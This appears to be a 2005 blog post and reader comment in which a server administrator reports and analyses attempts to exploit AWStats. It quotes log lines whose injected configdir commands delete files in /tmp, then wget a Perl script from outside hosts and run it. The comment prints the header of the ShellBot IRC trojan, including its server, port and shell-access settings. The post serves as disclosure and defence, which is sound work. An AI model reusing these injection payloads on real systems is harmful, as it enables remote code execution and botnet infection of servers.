I noticed the following entries in my log file:
66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;↵
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;↵
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
It appears that this person is attempting to have awstats download a perl script and have it executed on the web server. When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
I sent emails to the administrations of the various involved networks to have them stop this activity. Also, since I am assuming that the script writer is attempting to exploit a hole, that there is, or was, one in awstats. I have left a message on the Awstats developer forum, so they can look into this potential problem.
Update: This was fixed in the 6.4 version of awstats. If you are running an earlier version, you should update your awstats install.
This is part of the log
ReplyDelete219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
This a.txt file has the header
#!/usr/bin/perl
#
# ShellBOT - FBI TEAM Corporation
#
# 0ldW0lf - effbeeye81@aol.com
# - www.security.cnc.net
#
#
#
################ CONFIGURACAO #################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max='8'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='4'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=("the-brain","adilcm","alalah"); # Nick do administrador
#
#----------------------------------------------################################################
my @canais=("#kit *"); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick='`alah'; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'super'; # User ID
#
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
$servidor='213.150.48.155' unless $servidor; # Servidor de irc que vai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################